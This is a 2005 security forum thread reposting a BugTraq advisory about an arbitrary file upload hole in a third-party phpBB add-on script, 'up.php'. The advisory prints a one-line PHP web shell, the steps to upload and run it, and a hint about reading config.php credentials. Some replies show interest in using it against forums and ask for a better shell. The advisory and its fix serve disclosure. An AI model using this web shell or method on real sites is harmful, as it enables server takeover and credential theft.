|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 106
Members: 0
Total: 106
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
phpBB Upload Script "up.php" Arbitrary File Upload |
|
Posted: Fri Apr 08, 2005 8:00 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
To: BugTraq
Subject: phpBB Upload Script "up.php" Arbitrary File Upload
Date: Apr 8 2005 2:21AM
Author: Status-x <phr4xz gmail com>
Message-ID: <81ceb96d050407192175d0e344@mail.gmail.com>
#####################################################################
Advisory #1 "phpBB Upload Script "up.php" Arbitrary File Upload"
$ Author: Status-x
$ Contact: phr4xz gmail com - status-x hackersoft net
$ Date: 7 April 2005
$ Website: http://defacers.com.mx
$ Original Advisory: http://www.defacers.com.mx/advisories/2.txt
$ Risk: High
$ Vendor URL: http://phpbb.com
$ Affected Software: phpBB 2.0.x
Note: Sorry if it has been posted before
#####################################################################
-= Description =-
phpBB its a forums system written in php which can support images, polls,
private messages and more
http://www.phpbb.com
---------------------------------------------------------------------------
-= Vulnerabilities =-
- | "Arbitrary File Upload" |
In phpBB forums there is an script which can allow to remote and registered
users to upload files with arbitrary content and with any extension.
I didnt found any website where i can download the script so i couldnt
check who made it.
- | Examples: |
We can create and example code to upload it to the "test site"
<?
system($cmd)
?>
And save it as cmd.php. The we enter to:
--------------------------
http://target/phpbb/up.php
--------------------------
And upload our code, to see our file we just enter to:
-----------------------------------
http://targey/phpbb/uploads/cmd.php
-----------------------------------
And we could see that our file has been uploaded:
Warning: system(): Cannot execute a blank command in
/home/target/public_html/forum/uploads/tetx.php on line 2
The we can execute *NIX commands to obtain extremely compromising info
that could end with the "deface" of the affected site:
-----------------------------------------------------
Linux SERVER 2.4.21-4.0.1.ELsmp #1 SMP
Thu Oct 23 01:27:36 EDT 2003 i686 i686 i386 GNU/Linux
/home/target/public_html/forum/uploads
uid=32029(target) gid=530(target) groups=530(target)
------------------------------------------------------
This is just an example to what can be done by a malicious attacker.
- | "Password Disclosure" |
The remote or local attacker can also read the config.php file disclosing
the information about the DB and possible the FTP password
------------------------------------------------------
Example
-= How to FIX =-
Just filter the allowed extensions of the uploaded files in the up.php
source.
-= Contact =-
Status-x
phr4xz gmail com
http://www.defacers.com.mx
From url: http://www.securityfocus.com/archive/1/395351 |
|
|
|
|
|
|
|
|
Posted: Sat Apr 09, 2005 12:29 am |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
strange
i dont find any file with name up.php and uploads directory even in 2.0.4 version of PHPbb
??????? |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
Posted: Sat Apr 09, 2005 12:56 am |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
y3dips wrote: | strange
i dont find any file with name up.php and uploads directory even in 2.0.4 version of PHPbb
??????? |
Some third-party add-on MOD maybe |
|
|
|
|
Posted: Sat Apr 09, 2005 4:41 am |
|
|
shai-tan |
Valuable expert |
|
|
Joined: Feb 22, 2005 |
Posts: 477 |
|
|
|
|
|
|
|
Yes its not on any of my older versions. |
|
_________________ Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
Posted: Sat Apr 09, 2005 5:22 am |
|
|
wyk |
Regular user |
|
|
Joined: Mar 15, 2005 |
Posts: 10 |
|
|
|
|
|
|
|
i found a lot of forums containing the up.php, and the strangest is that the first i found allready contained cmd.php..... |
|
Last edited by wyk on Sat Apr 09, 2005 11:45 am; edited 1 time in total |
|
|
|
Posted: Sat Apr 09, 2005 5:28 am |
|
|
shai-tan |
Valuable expert |
|
|
Joined: Feb 22, 2005 |
Posts: 477 |
|
|
|
|
|
|
|
Yeah its strange looking at the older 2.0.x. |
|
_________________ Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
Posted: Sat Apr 09, 2005 3:37 pm |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
waraxe : hum, maybe yaou are right, the "up.php" maybe in another module
wyx : how a lucky guy you are |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
Posted: Sat Apr 09, 2005 3:55 pm |
|
|
wyk |
Regular user |
|
|
Joined: Mar 15, 2005 |
Posts: 10 |
|
|
|
|
|
|
|
y3dips: there was an error when i wanted to open it. did not try to put my own.
but there did not apear any exploit that would work on the forum that i wanted so much.. |
|
|
|
|
Posted: Tue May 31, 2005 5:42 pm |
|
|
theOne |
Regular user |
|
|
Joined: May 31, 2005 |
Posts: 8 |
|
|
|
|
|
|
|
instead of th system command, what's the best php shell script out there to use? |
|
|
|
|
Posted: Tue May 31, 2005 6:09 pm |
|
|
LINUX |
Moderator |
|
|
Joined: May 24, 2004 |
Posts: 404 |
Location: Caiman |
|
|
|
|
|
|
|
|
|
|
Posted: Wed Jun 01, 2005 1:28 am |
|
|
erg0t |
Valuable expert |
|
|
Joined: Apr 08, 2005 |
Posts: 55 |
Location: Uruguay |
|
|
|
|
|
|
the up.php script is a hack, i don't remember well but i think i find in phpbbhacks |
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|